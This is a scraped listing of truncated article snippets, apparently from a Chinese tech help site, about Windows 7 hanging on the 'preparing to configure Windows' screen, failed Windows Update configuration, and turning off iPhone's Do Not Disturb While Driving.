不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57